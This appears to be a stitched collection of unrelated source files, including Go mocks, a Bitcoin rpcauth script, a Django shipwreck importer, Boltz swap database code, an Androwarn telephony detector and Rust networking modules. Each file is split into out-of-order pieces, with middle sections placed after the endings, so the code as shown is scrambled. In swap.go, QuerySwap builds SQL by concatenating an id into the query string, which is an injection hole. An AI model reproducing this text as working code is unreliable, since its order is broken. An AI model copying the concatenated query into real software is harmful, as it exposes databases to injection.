return mock.WatchFunc(opts)
}
// WatchCalls gets all the calls that were made to Watch.
// Check the length with:
// len(mockedUserAttributeInterface.WatchCalls())
func (mock *UserAttributeInterfaceMock) WatchCalls() []struct {
Opts v1.ListOptions
} {
var calls []struct {
Opts v1.ListOptions
}
lockUserAttributeInterfaceMockWatch.RLock()
calls = mock.calls.Watch
lockUserAttributeInterfaceMockWatch.RUnlock()
return calls
}
var (
lockUserAttributesGetterMockUserAttributes sync.RWMutex
)
// Ensure, that UserAttributesGetterMock does implement UserAttributesGetter.
// If this is not the case, regenerate this file with moq.
var _ v3.UserAttributesGetter = &UserAttributesGetterMock{}
// UserAttributesGetterMock is a mock implementation of UserAttributesGetter.
//
// func TestSomethingThatUsesUserAttributesGetter(t *testing.T) {
//
// // make and configure a mocked UserAttributesGetter
// mockedUserAttributesGetter := &UserAttributesGetterMock{
// UserAttributesFunc: func(namespace string) v3.UserAttributeInterface {
// panic("mock out the UserAttributes method")
// },
// }
//
// // use mockedUserAttributesGetter in code that requires UserAttributesGetter
// // and then make assertions.
//
// }
type UserAttributesGetterMock struct {
// UserAttributesFunc mocks the UserAttributes method.
UserAttributesFunc func(namespace string) v3.UserAttributeInterface
// calls tracks calls to the methods.
calls struct {
// UserAttributes holds details about calls to the UserAttributes method.
UserAttributes []struct {
// Namespace is the namespace argument value.
Namespace string
}
}
}
// UserAttributes calls UserAttributesFunc.
func (mock *UserAttributesGetterMock) UserAttributes(namespace string) v3.UserAttributeInterface {
if mock.UserAttributesFunc == nil {
panic("UserAttributesGetterMock.UserAttributesFunc: method is nil but UserAttributesGetter.UserAttributes was just called")
}
callInfo := struct {
Namespace string
}{
Namespace: namespace,
}
lockUserAttributesGetterMockUserAttributes.Lock()
mock.calls.UserAttributes = append(mock.calls.UserAttributes, callInfo)
lockUserAttributesGetterMockUserAttributes.Unlock()
return mock.UserAttributesFunc(namespace)
}
// UserAttributesCalls gets all the calls that were made to UserAttributes.
// Check the length with:
// len(mockedUserAttributesGetter.UserAttributesCalls())
func (mock *UserAttributesGetterMock) UserAttributesCalls() []struct {
Namespace string
} {
var calls []struct {
Namespace string
}
lockUserAttributesGetterMockUserAttributes.RLock()
calls = mock.calls.UserAttributes
lockUserAttributesGetterMockUserAttributes.RUnlock()
return calls
} | // Selector is the selector argument value.
Selector labels.Selector
} |
rpcuser.py | #!/usr/bin/env python2
# Copyright (c) 2015-2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
import hashlib | import hmac
if len(sys.argv) < 2:
sys.stderr.write('Please include username as an argument.\n')
sys.exit(0)
username = sys.argv[1]
#This uses os.urandom() underneath
cryptogen = SystemRandom()
#Create 16 byte hex salt
salt_sequence = [cryptogen.randrange(256) for i in range(16)]
hexseq = list(map(hex, salt_sequence))
salt = "".join([x[2:] for x in hexseq])
#Create 32 byte b64 password
password = base64.urlsafe_b64encode(os.urandom(32))
digestmod = hashlib.sha256
if sys.version_info.major >= 3:
password = password.decode('utf-8')
digestmod = 'SHA256'
m = hmac.new(bytearray(salt, 'utf-8'), bytearray(password, 'utf-8'), digestmod)
result = m.hexdigest()
print("String to be appended to soiscoin.conf:")
print("rpcauth="+username+":"+salt+"$"+result)
print("Your password:\n"+password) | import sys
import os
from random import SystemRandom
import base64 |
egoParallel.go | package main
import (
"flag"
"fmt"
"log"
"os"
"time"
"github.com/ericlagergren/decimal"
)
var (
precision int
iterations uint64
hard bool
channel chan *decimal.Big
)
func main() {
// Options
precPtr := flag.Int("p", 10001, "Precision for calculations")
iterPtr := flag.Uint64("i", 1625, "Value of infinity")
hard := flag.Bool("hard", false, "Stress your hardware more, more iterations! Forces set iterations and precison, overiding any set.")
debug := flag.Bool("debug", false, "Used for debugging. This will write to log.txt")
flag.Parse()
// Iterations
precision = *precPtr
iterations = *iterPtr
if *hard {
iterations = 4288
precision = 30001
}
start := time.Now()
channel = make(chan *decimal.Big, iterations)
//go series(0, *iterPtr)
var answer = decimal.WithPrecision(precision).SetUint64(0)
for i := uint64(1); i < iterations; i++ {
go series(i-1, i)
}
for counter := uint64(0); counter < iterations-1; counter++ {
answer = answer.Add(<-channel, answer)
//fmt.Print(".")
//time.Sleep(time.Millisecond*5)
}
// Logging. Only creates log.txt with -debug option
if *debug {
f, err := os.OpenFile("log.txt",
os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644)
if err != nil {
log.Println(err)
}
defer f.Close()
logger := log.New(f, "eGoDecimal ", log.LstdFlags)
// Add things to log for debug here
logger.Println(answer)
logger.Printf("\nRun Time: %v\n", time.Now().Sub(start))
}
// Print running time to console
fmt.Printf("Run Time: %v\n", time.Now().Sub(start))
}
func series(lower, upper uint64) |
func factorial(x uint64) (fact *decimal.Big) {
fact = decimal.WithPrecision(precision).SetUint64(1)
//fmt.Println("Prec",fact.Precision())
for i := x; i > 0; i-- {
fact.Mul(fact, decimal.New((int64(i)), 0))
}
//fmt.Println("ActualPrec:",fact.Precision())
return
}
| {
var res = decimal.WithPrecision(precision).SetUint64(0)
for n := lower; n < upper; n++ {
add := decimal.WithPrecision(precision).SetUint64(((2 * n) + 2))
add.Quo(add, factorial((2*n)+1))
res.Add(res, add)
}
channel <- res
} |
import.py | import django
import json
import os
import sys
# Make sure we can see the parent directory to import
sys.path.append('../')
os.environ['DJANGO_SETTINGS_MODULE'] = 'shipwrecks.settings'
# Make sure Django is set up
django.setup()
# Now we can import our Django model(s)
from wrecks.models import Wreck
from wrecks.models import WreckType
from wrecks.models import SOURCE_CHOICES
# Import the GEOS library needed to create points
from django.contrib.gis.geos import Point
from django.contrib.gis.geos import GEOSGeometry
if __name__ == '__main__':
# Make sure we have specified a file to import | sys.exit()
# Open the GeoJSON file
json_filepath = sys.argv[-1]
try:
with open(json_filepath, 'r') as f:
data = json.loads(f.read())
except IOError:
sys.exit("Error opening GeoJSON file")
except ValueError:
sys.exit('Error: the file does not appear to be valid JSON.')
# Turn each feature into a Wreck model instance
for feature_dict in data['features']:
wreck = Wreck()
properties = feature_dict['properties']
# Figure out the source type
source_name = properties['source']
if source_name == 'enc_wrecks':
source = SOURCE_CHOICES[1][0]
else:
source = SOURCE_CHOICES[0][0]
# Figure out if the wreck type exists (and normalize the values)
wreck_type_value = properties['feature_type']
if not wreck_type_value:
wreck_type_value = 'Unknown'
else:
if wreck_type_value.startswith('Wrecks -'):
wreck_type_value = wreck_type_value.replace('Wrecks -', 'Wreck -')
wreck_type, created = WreckType.objects.get_or_create(name=wreck_type_value)
# Figure out the depth
if source_name == 'enc_wrecks':
# ENC Wrecks are always in meters
try:
depth_meters = float(properties['depth'])
except ValueError:
depth_meters = None
else:
if not properties['depth']:
depth_meters = None
else:
depth_value = properties['depth']
sounding = properties['sounding']
if 'meters' in sounding:
depth_meters = depth_value
elif 'feet' in sounding:
# Convert feet and tenths to meters
depth_meters = depth_value * 0.3048
elif 'fathoms' in sounding:
# Convert fathoms to meters
depth_meters = depth_value * 1.8288
else:
depth_meters = None
# Create the Point object from the lat and long
lat = feature_dict['geometry']['coordinates'][1]
lng = feature_dict['geometry']['coordinates'][0]
location_point = GEOSGeometry('POINT(%f %f)' % (lng, lat), srid='NADS83')
# Get the name or assign 'unknown'
vessel_name = properties['vessel_name']
if not vessel_name:
vessel_name = 'Unknown'
# Cast the year sunk into an integer
try:
year_sunk = int(properties['yearsunk'])
except ValueError:
year_sunk = None
wreck.name = vessel_name
wreck.history = properties['history']
wreck.wreck_type = wreck_type
wreck.year_sunk = year_sunk
wreck.source = source
wreck.source_identifier = feature_dict['id']
wreck.depth_meters = depth_meters
wreck.location = location_point
# Save the new wreck
wreck.save() | if len(sys.argv) < 2:
print 'You must specify a geojson file to import.'
print 'Usage: $ python import.py <geojson file>' |
swap.go | package database
import (
"database/sql"
"encoding/hex"
"errors"
"github.com/BoltzExchange/boltz-lnd/boltz"
"github.com/BoltzExchange/boltz-lnd/boltzrpc"
"github.com/btcsuite/btcd/btcec"
"strconv"
)
type Swap struct {
Id string
State boltzrpc.SwapState
Error string
Status boltz.SwapUpdateEvent
PrivateKey *btcec.PrivateKey
Preimage []byte
RedeemScript []byte
Invoice string
Address string
ExpectedAmount uint64
TimoutBlockHeight uint32
LockupTransactionId string
RefundTransactionId string
}
type SwapSerialized struct {
Id string
State string
Error string
Status string
PrivateKey string
Preimage string
RedeemScript string
Invoice string
Address string
ExpectedAmount uint64
TimeoutBlockHeight uint32
LockupTransactionId string
RefundTransactionId string
}
func (swap *Swap) Serialize() SwapSerialized {
preimage := ""
if swap.Preimage != nil {
preimage = hex.EncodeToString(swap.Preimage)
}
return SwapSerialized{
Id: swap.Id,
State: boltzrpc.SwapState_name[int32(swap.State)],
Error: swap.Error,
Status: swap.Status.String(),
PrivateKey: formatPrivateKey(swap.PrivateKey),
Preimage: preimage,
RedeemScript: hex.EncodeToString(swap.RedeemScript),
Invoice: swap.Invoice,
Address: swap.Address,
ExpectedAmount: swap.ExpectedAmount,
TimeoutBlockHeight: swap.TimoutBlockHeight,
LockupTransactionId: swap.LockupTransactionId,
RefundTransactionId: swap.RefundTransactionId,
}
}
func | (rows *sql.Rows) (*Swap, error) {
var swap Swap
var status string
var privateKey string
var preimage string
var redeemScript string
err := scanRow(
rows,
map[string]interface{}{
"id": &swap.Id,
"state": &swap.State,
"error": &swap.Error,
"status": &status,
"privateKey": &privateKey,
"preimage": &preimage,
"redeemScript": &redeemScript,
"invoice": &swap.Invoice,
"address": &swap.Address,
"expectedAmount": &swap.ExpectedAmount,
"timeoutBlockheight": &swap.TimoutBlockHeight,
"lockupTransactionId": &swap.LockupTransactionId,
"refundTransactionId": &swap.RefundTransactionId,
},
)
if err != nil {
return nil, err
}
swap.Status = boltz.ParseEvent(status)
privateKeyBytes, err := hex.DecodeString(privateKey)
if err != nil {
return nil, err
}
swap.PrivateKey, _ = parsePrivateKey(privateKeyBytes)
if preimage != "" {
swap.Preimage, err = hex.DecodeString(preimage)
if err != nil {
return nil, err
}
}
swap.RedeemScript, err = hex.DecodeString(redeemScript)
if err != nil {
return nil, err
}
return &swap, err
}
func (database *Database) QuerySwap(id string) (swap *Swap, err error) {
rows, err := database.db.Query("SELECT * FROM swaps WHERE id = '" + id + "'")
if err != nil {
return swap, err
}
defer rows.Close()
if rows.Next() {
swap, err = parseSwap(rows)
if err != nil {
return swap, err
}
} else {
return swap, errors.New("could not find Swap " + id)
}
return swap, err
}
func (database *Database) querySwaps(query string) (swaps []Swap, err error) {
rows, err := database.db.Query(query)
if err != nil {
return nil, err
}
defer rows.Close()
for rows.Next() {
swap, err := parseSwap(rows)
if err != nil {
return nil, err
}
swaps = append(swaps, *swap)
}
return swaps, err
}
func (database *Database) QuerySwaps() ([]Swap, error) {
return database.querySwaps("SELECT * FROM swaps")
}
func (database *Database) QueryPendingSwaps() ([]Swap, error) {
return database.querySwaps("SELECT * FROM swaps WHERE state = '" + strconv.Itoa(int(boltzrpc.SwapState_PENDING)) + "'")
}
func (database *Database) QueryRefundableSwaps(currentBlockHeight uint32) ([]Swap, error) {
return database.querySwaps("SELECT * FROM swaps WHERE (state = '" + strconv.Itoa(int(boltzrpc.SwapState_PENDING)) + "' OR state = '" + strconv.Itoa(int(boltzrpc.SwapState_SERVER_ERROR)) + "') AND timeoutBlockHeight <= " + strconv.FormatUint(uint64(currentBlockHeight), 10))
}
func (database *Database) CreateSwap(swap Swap) error {
insertStatement := "INSERT INTO swaps (id, state, error, status, privateKey, preimage, redeemScript, invoice, address, expectedAmount, timeoutBlockheight, lockupTransactionId, refundTransactionId) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)"
statement, err := database.db.Prepare(insertStatement)
if err != nil {
return err
}
preimage := ""
if swap.Preimage != nil {
preimage = hex.EncodeToString(swap.Preimage)
}
_, err = statement.Exec(
swap.Id,
swap.State,
swap.Error,
swap.Status.String(),
formatPrivateKey(swap.PrivateKey),
preimage,
hex.EncodeToString(swap.RedeemScript),
swap.Invoice,
swap.Address,
swap.ExpectedAmount,
swap.TimoutBlockHeight,
swap.LockupTransactionId,
swap.RefundTransactionId,
)
if err != nil {
return err
}
return statement.Close()
}
func (database *Database) UpdateSwapState(swap *Swap, state boltzrpc.SwapState, error string) error {
swap.State = state
swap.Error = error
_, err := database.db.Exec("UPDATE swaps SET state = ?, error = ? WHERE id = ?", state, error, swap.Id)
return err
}
func (database *Database) UpdateSwapStatus(swap *Swap, status boltz.SwapUpdateEvent) error {
swap.Status = status
_, err := database.db.Exec("UPDATE swaps SET status = ? WHERE id = ?", status.String(), swap.Id)
return err
}
func (database *Database) SetSwapInvoice(swap *Swap, invoice string) error {
swap.Invoice = invoice
_, err := database.db.Exec("UPDATE swaps SET invoice = ? WHERE id = ?", invoice, swap.Id)
return err
}
func (database *Database) SetSwapLockupTransactionId(swap *Swap, lockupTransactionId string) error {
swap.LockupTransactionId = lockupTransactionId
_, err := database.db.Exec("UPDATE swaps SET lockupTransactionId = ? WHERE id = ?", lockupTransactionId, swap.Id)
return err
}
func (database *Database) SetSwapRefundTransactionId(swap *Swap, refundTransactionId string) error {
swap.State = boltzrpc.SwapState_REFUNDED
swap.RefundTransactionId = refundTransactionId
_, err := database.db.Exec("UPDATE swaps SET state = ?, refundTransactionId = ? WHERE id = ?", swap.State, refundTransactionId, swap.Id)
return err
}
| parseSwap |
telephony_identifiers.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
# This file is part of Androwarn.
#
# Copyright (C) 2012, 2019, Thomas Debize <tdebize at mail.com>
# All rights reserved.
#
# Androwarn is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Androwarn is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Androwarn. If not, see <http://www.gnu.org/licenses/>.
# Global imports
import logging
# Androwarn modules import
from lib.warn.util.util import *
# Logguer
log = logging.getLogger('log')
def detect_telephony_gsm_GsmCellLocation(x):
"""
@param x : a Analysis instance
@rtype : a list strings for exemple [ 'This application makes phone calls', "This application sends an SMS message 'Premium SMS' to the '12345' phone number" ]
"""
method_listing = [
("getLac()", "This application reads the Location Area Code value"),
("getCid()", "This application reads the Cell ID value")
]
class_name = 'Landroid/telephony/gsm/GsmCellLocation'
return structural_analysis_search_method_bulk(class_name, method_listing, x)
def detect_Telephony_Manager_Leakages(x) :
"""
@param x : a Analysis instance
@rtype : a list strings for exemple [ 'This application makes phone calls', "This application sends an SMS message 'Premium SMS' to the '12345' phone number" ]
"""
method_listing = [
("getCallState()", "This application reads the phone's current state"),
("getCellLocation()", "This application reads the current location of the device"),
("getDataActivity()", "This application reads the type of activity on a data connection"),
("getDataState()", "This application reads the current data connection state"),
("getDeviceId()", "This application reads the unique device ID, i.e the IMEI for GSM and the MEID or ESN for CDMA phones"),
("getDeviceSoftwareVersion()", "This application reads the software version number for the device, for example, the IMEI/SV for GSM phones"),
("getLine1Number()", "This application reads the phone number string for line 1, for example, the MSISDN for a GSM phone"),
("getNeighboringCellInfo()", "This application reads the neighboring cell information of the device"),
("getNetworkCountryIso()", "This application reads the ISO country code equivalent of the current registered operator's MCC (Mobile Country Code)"),
("getNetworkOperator()", "This application reads the numeric name (MCC+MNC) of current registered operator"),
("getNetworkOperatorName()", "This application reads the operator name"),
("getNetworkType()", "This application reads the radio technology (network type) currently in use on the device for data transmission"),
("getPhoneType()", "This application reads the device phone type value"),
("getSimCountryIso()", "This application reads the ISO country code equivalent for the SIM provider's country code"),
("getSimOperator()", "This application reads the MCC+MNC of the provider of the SIM"),
("getSimOperatorName()", "This application reads the Service Provider Name (SPN)"),
("getSimSerialNumber()", "This application reads the SIM's serial number"),
("getSimState()", "This application reads the constant indicating the state of the device SIM card"),
("getSubscriberId()", "This application reads the unique subscriber ID, for example, the IMSI for a GSM phone"),
("getVoiceMailAlphaTag()", "This application reads the alphabetic identifier associated with the voice mail number"),
("getVoiceMailNumber()", "This application reads the voice mail number")
]
class_name = 'Landroid/telephony/TelephonyManager'
return structural_analysis_search_method_bulk(class_name, method_listing, x)
def | (x) :
"""
@param x : a Analysis instance
@rtype : a list strings for the concerned category, for exemple [ 'This application makes phone calls', "This application sends an SMS message 'Premium SMS' to the '12345' phone number" ]
"""
result = []
result.extend( detect_Telephony_Manager_Leakages(x) )
result.extend( detect_telephony_gsm_GsmCellLocation(x) )
return result | gather_telephony_identifiers_leakage |
error.rs | /*
* Copyright 2017 Bitwise IO, Inc.
* Copyright 2019 Cargill Incorporated
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
* -----------------------------------------------------------------------------
*/
use std::error::Error;
#[derive(Debug)]
pub enum ApplyError {
/// Returned for an Invalid Transaction.
InvalidTransaction(String),
/// Returned when an internal error occurs during transaction processing.
InternalError(String),
}
impl Error for ApplyError {
fn source(&self) -> Option<&(dyn Error + 'static)> {
None
}
}
impl std::fmt::Display for ApplyError {
fn fmt(&self, f: &mut std::fmt::Formatter) -> std::fmt::Result {
match *self {
ApplyError::InvalidTransaction(ref s) => write!(f, "InvalidTransaction: {}", s),
ApplyError::InternalError(ref s) => write!(f, "InternalError: {}", s),
}
}
}
#[derive(Debug)]
pub enum ContextError {
/// Returned for an authorization error
AuthorizationError(String),
/// Returned when a error occurs due to missing info in a response
ResponseAttributeError(String),
/// Returned when there is an issues setting receipt data or events.
TransactionReceiptError(String),
/// Returned when a ProtobufError is returned during serializing
SerializationError(Box<dyn Error>),
/// Returned when an error is returned when sending a message
SendError(Box<dyn Error>),
/// Returned when an error is returned when sending a message
ReceiveError(Box<dyn Error>),
}
impl Error for ContextError {
fn source(&self) -> Option<&(dyn Error + 'static)> {
match self {
ContextError::AuthorizationError(_) => None,
ContextError::ResponseAttributeError(_) => None,
ContextError::TransactionReceiptError(_) => None,
ContextError::SerializationError(err) => Some(&**err),
ContextError::SendError(err) => Some(&**err),
ContextError::ReceiveError(err) => Some(&**err),
}
}
}
impl std::fmt::Display for ContextError {
fn fmt(&self, f: &mut std::fmt::Formatter) -> std::fmt::Result |
}
impl From<ContextError> for ApplyError {
fn from(context_error: ContextError) -> Self {
match context_error {
ContextError::TransactionReceiptError(..) => {
ApplyError::InternalError(format!("{}", context_error))
}
_ => ApplyError::InvalidTransaction(format!("{}", context_error)),
}
}
}
| {
match *self {
ContextError::AuthorizationError(ref s) => write!(f, "AuthorizationError: {}", s),
ContextError::ResponseAttributeError(ref s) => {
write!(f, "ResponseAttributeError: {}", s)
}
ContextError::TransactionReceiptError(ref s) => {
write!(f, "TransactionReceiptError: {}", s)
}
ContextError::SerializationError(ref err) => write!(f, "SerializationError: {}", err),
ContextError::SendError(ref err) => write!(f, "SendError: {}", err),
ContextError::ReceiveError(ref err) => write!(f, "ReceiveError: {}", err),
}
} |
reactor.rs | use crate::{
heartbeat::Heartbeat,
socket_state::{SocketEvent, SocketStateHandle},
tcp::TcpStream,
thread::ThreadHandle,
Result,
};
use log::trace;
use mio::{Events, Interest, Poll, Token, Waker};
use std::{
collections::HashMap,
fmt,
sync::{
atomic::{AtomicBool, AtomicUsize, Ordering},
Arc,
},
thread::Builder as ThreadBuilder,
};
pub type Slot = usize;
pub trait ReactorBuilder: fmt::Debug + Send + Sync {
fn build(&self, heartbeat: Heartbeat) -> Result<Box<dyn Reactor + Send>>;
}
pub trait Reactor: fmt::Debug + Send {
fn register(&mut self, socket: &mut TcpStream, socket_state: SocketStateHandle)
-> Result<Slot>;
fn handle(&self) -> Box<dyn ReactorHandle + Send> {
Box::new(DummyHandle)
}
#[allow(clippy::boxed_local)]
fn start(self: Box<Self>) -> Result<ThreadHandle> {
Ok(ThreadHandle::default())
}
}
pub trait ReactorHandle {
fn shutdown(&self) -> Result<()> |
fn start_heartbeat(&self) {}
fn poll_read(&self, _slot: Slot) {}
fn poll_write(&self, _slot: Slot) {}
}
pub(crate) struct DefaultReactorBuilder;
impl ReactorBuilder for DefaultReactorBuilder {
fn build(&self, heartbeat: Heartbeat) -> Result<Box<dyn Reactor + Send>> {
Ok(Box::new(DefaultReactor::new(heartbeat)?))
}
}
pub(crate) struct DefaultReactor {
slot: AtomicUsize,
poll: Poll,
heartbeat: Heartbeat,
slots: HashMap<Token, SocketStateHandle>,
handle: DefaultReactorHandle,
}
#[derive(Clone)]
pub(crate) struct DefaultReactorHandle {
run: Arc<AtomicBool>,
waker: Arc<Waker>,
}
impl Reactor for DefaultReactor {
fn handle(&self) -> Box<dyn ReactorHandle + Send> {
Box::new(self.handle.clone())
}
fn register(
&mut self,
socket: &mut TcpStream,
socket_state: SocketStateHandle,
) -> Result<usize> {
let token = Token(self.slot.fetch_add(1, Ordering::SeqCst));
self.poll
.registry()
.register(socket, token, Interest::READABLE | Interest::WRITABLE)?;
self.slots.insert(token, socket_state);
Ok(token.0)
}
fn start(mut self: Box<Self>) -> Result<ThreadHandle> {
Ok(ThreadHandle::new(
ThreadBuilder::new()
.name("lapin-reactor".into())
.spawn(move || {
let mut events = Events::with_capacity(16);
while self.should_run() {
self.run(&mut events)?;
}
Ok(())
})?,
))
}
}
impl DefaultReactor {
fn new(heartbeat: Heartbeat) -> Result<Self> {
let poll = Poll::new()?;
let handle = DefaultReactorHandle {
run: Arc::new(AtomicBool::new(true)),
waker: Arc::new(Waker::new(poll.registry(), Token(0))?),
};
Ok(Self {
slot: AtomicUsize::new(1),
poll,
heartbeat,
slots: HashMap::default(),
handle,
})
}
fn should_run(&self) -> bool {
self.handle.run.load(Ordering::SeqCst)
}
fn run(&mut self, events: &mut Events) -> Result<()> {
trace!("reactor poll");
self.poll.poll(events, self.heartbeat.poll_timeout())?;
trace!("reactor poll done");
for event in events.iter() {
if let Some(socket) = self.slots.get(&event.token()) {
if event.is_error() {
socket.send(SocketEvent::Error);
}
if event.is_read_closed() || event.is_write_closed() {
socket.send(SocketEvent::Closed);
}
if event.is_readable() {
socket.send(SocketEvent::Readable);
}
if event.is_writable() {
socket.send(SocketEvent::Writable);
}
}
}
Ok(())
}
}
impl ReactorHandle for DefaultReactorHandle {
fn shutdown(&self) -> Result<()> {
self.run.store(false, Ordering::SeqCst);
self.waker.wake()?;
Ok(())
}
}
impl fmt::Debug for DefaultReactorBuilder {
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
f.debug_struct("DefaultReactorBuilder").finish()
}
}
impl fmt::Debug for DefaultReactor {
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
f.debug_struct("DefaultReactor").finish()
}
}
#[derive(Clone)]
struct DummyHandle;
impl ReactorHandle for DummyHandle {}
| {
Ok(())
} |
upload.go | package cli
import (
"os"
"github.com/pkg/errors"
"github.com/replicatedhq/kots/pkg/logger"
"github.com/replicatedhq/kots/pkg/upload"
"github.com/spf13/cobra"
"github.com/spf13/viper"
)
func UploadCmd() *cobra.Command | {
cmd := &cobra.Command{
Use: "upload [source]",
Short: "Upload Kubernetes manifests from the local filesystem to your cluster",
Long: `Upload Kubernetes manifests from the local filesystem to a cluster, creating a new version of the application that can be deployed.`,
SilenceUsage: true,
SilenceErrors: false,
PreRun: func(cmd *cobra.Command, args []string) {
viper.BindPFlags(cmd.Flags())
},
RunE: func(cmd *cobra.Command, args []string) error {
v := viper.GetViper()
if len(args) == 0 {
cmd.Help()
os.Exit(1)
}
log := logger.NewLogger()
sourceDir := homeDir()
if len(args) > 0 {
sourceDir = ExpandDir(args[0])
}
uploadOptions := upload.UploadOptions{
Namespace: v.GetString("namespace"),
Kubeconfig: v.GetString("kubeconfig"),
ExistingAppSlug: v.GetString("slug"),
NewAppName: v.GetString("name"),
UpstreamURI: v.GetString("upstream-uri"),
Endpoint: "http://localhost:3000",
}
stopCh := make(chan struct{})
defer close(stopCh)
errChan, err := upload.StartPortForward(uploadOptions.Namespace, uploadOptions.Kubeconfig, stopCh)
if err != nil {
return errors.Wrap(err, "failed to port forward")
}
go func() {
select {
case err := <-errChan:
if err != nil {
log.Error(err)
os.Exit(-1)
}
case <-stopCh:
}
}()
if err := upload.Upload(sourceDir, uploadOptions); err != nil {
return errors.Cause(err)
}
return nil
},
}
cmd.Flags().String("kubeconfig", defaultKubeConfig(), "the kubeconfig to use")
cmd.Flags().StringP("namespace", "n", "default", "the namespace to upload to")
cmd.Flags().String("slug", "", "the application slug to use. if not present, a new one will be created")
cmd.Flags().String("name", "", "the name of the kotsadm application to create")
cmd.Flags().String("upstream-uri", "", "the upstream uri that can be used to check for updates")
return cmd
} |
|
extremevalue.py | #
# Generated with ExtremeValueBlueprint | from dmt.dimension import Dimension
from dmt.attribute import Attribute
from dmt.enum_attribute import EnumAttribute
from dmt.blueprint_attribute import BlueprintAttribute
from sima.sima.blueprints.moao import MOAOBlueprint
class ExtremeValueBlueprint(MOAOBlueprint):
""""""
def __init__(self, name="ExtremeValue", package_path="sima/metocean", description=""):
super().__init__(name,package_path,description)
self.attributes.append(Attribute("name","string","",default=""))
self.attributes.append(Attribute("description","string","",default=""))
self.attributes.append(Attribute("_id","string","",default=""))
self.attributes.append(BlueprintAttribute("scriptableValues","sima/sima/ScriptableValue","",True,Dimension("*")))
self.attributes.append(Attribute("extreme","number","",default=0.0))
self.attributes.append(Attribute("returnPeriod","number","",default=0.0)) | from dmt.blueprint import Blueprint |
lifecycle_execution_test.go | package build_test
import (
"bytes"
"context"
"fmt"
"io/ioutil"
"math/rand"
"os"
"path/filepath"
"testing"
"time"
"github.com/buildpacks/pack/internal/cache"
"github.com/google/go-containerregistry/pkg/name"
"github.com/apex/log"
"github.com/buildpacks/lifecycle/api"
"github.com/docker/docker/api/types/container"
"github.com/docker/docker/client"
"github.com/heroku/color"
"github.com/sclevine/spec"
"github.com/sclevine/spec/report"
"github.com/buildpacks/pack/internal/build"
"github.com/buildpacks/pack/internal/build/fakes"
ilogging "github.com/buildpacks/pack/internal/logging"
h "github.com/buildpacks/pack/testhelpers"
)
// TestLifecycleExecution are unit tests that test each possible phase to ensure they are executed with the proper parameters
func TestLifecycleExecution(t *testing.T) {
rand.Seed(time.Now().UTC().UnixNano())
color.Disable(true)
defer color.Disable(false)
spec.Run(t, "phases", testLifecycleExecution, spec.Report(report.Terminal{}), spec.Sequential())
}
func testLifecycleExecution(t *testing.T, when spec.G, it spec.S) {
// Avoid contaminating tests with existing docker configuration.
// GGCR resolves the default keychain by inspecting DOCKER_CONFIG - this is used by the Analyze step
// when constructing the auth config (see `auth.BuildEnvVar` in phases.go).
var dockerConfigDir string
it.Before(func() {
var err error
dockerConfigDir, err = ioutil.TempDir("", "empty-docker-config-dir")
h.AssertNil(t, err)
h.AssertNil(t, os.Setenv("DOCKER_CONFIG", dockerConfigDir))
})
it.After(func() {
h.AssertNil(t, os.Unsetenv("DOCKER_CONFIG"))
h.AssertNil(t, os.RemoveAll(dockerConfigDir))
})
when("#NewLifecycleExecution", func() {
when("lifecycle supports multiple platform APIs", func() {
it("select the latest supported version", func() {
fakeBuilder, err := fakes.NewFakeBuilder(fakes.WithSupportedPlatformAPIs([]*api.Version{
api.MustParse("0.2"),
api.MustParse("0.3"),
api.MustParse("0.4"),
api.MustParse("0.5"),
api.MustParse("0.6"),
}))
h.AssertNil(t, err)
lifecycleExec := newTestLifecycleExec(t, false, fakes.WithBuilder(fakeBuilder))
h.AssertEq(t, lifecycleExec.PlatformAPI().String(), "0.6")
})
})
when("supported platform API is deprecated", func() {
it("select the deprecated version", func() {
fakeBuilder, err := fakes.NewFakeBuilder(
fakes.WithDeprecatedPlatformAPIs([]*api.Version{api.MustParse("0.4")}),
fakes.WithSupportedPlatformAPIs([]*api.Version{api.MustParse("1.2")}),
)
h.AssertNil(t, err)
lifecycleExec := newTestLifecycleExec(t, false, fakes.WithBuilder(fakeBuilder))
h.AssertEq(t, lifecycleExec.PlatformAPI().String(), "0.4")
})
})
when("pack doesn't support any lifecycle supported platform API", func() {
it("errors", func() {
fakeBuilder, err := fakes.NewFakeBuilder(
fakes.WithSupportedPlatformAPIs([]*api.Version{api.MustParse("1.2")}),
)
h.AssertNil(t, err)
_, err = newTestLifecycleExecErr(t, false, fakes.WithBuilder(fakeBuilder))
h.AssertError(t, err, "unable to find a supported Platform API version")
})
})
})
when("Run", func() {
var (
imageName name.Tag
fakeBuilder *fakes.FakeBuilder
outBuf bytes.Buffer
logger *ilogging.LogWithWriters
docker *client.Client
fakePhaseFactory *fakes.FakePhaseFactory
)
it.Before(func() {
var err error
imageName, err = name.NewTag("/some/image", name.WeakValidation)
h.AssertNil(t, err)
fakeBuilder, err = fakes.NewFakeBuilder(fakes.WithSupportedPlatformAPIs([]*api.Version{api.MustParse("0.3")}))
h.AssertNil(t, err)
logger = ilogging.NewLogWithWriters(&outBuf, &outBuf)
docker, err = client.NewClientWithOpts(client.FromEnv, client.WithVersion("1.38"))
h.AssertNil(t, err)
fakePhaseFactory = fakes.NewFakePhaseFactory()
})
when("Run using creator", func() {
it("succeeds", func() {
opts := build.LifecycleOptions{
Publish: false,
ClearCache: false,
RunImage: "test",
Image: imageName,
Builder: fakeBuilder,
TrustBuilder: false,
UseCreator: true,
}
lifecycle, err := build.NewLifecycleExecution(logger, docker, opts)
h.AssertNil(t, err)
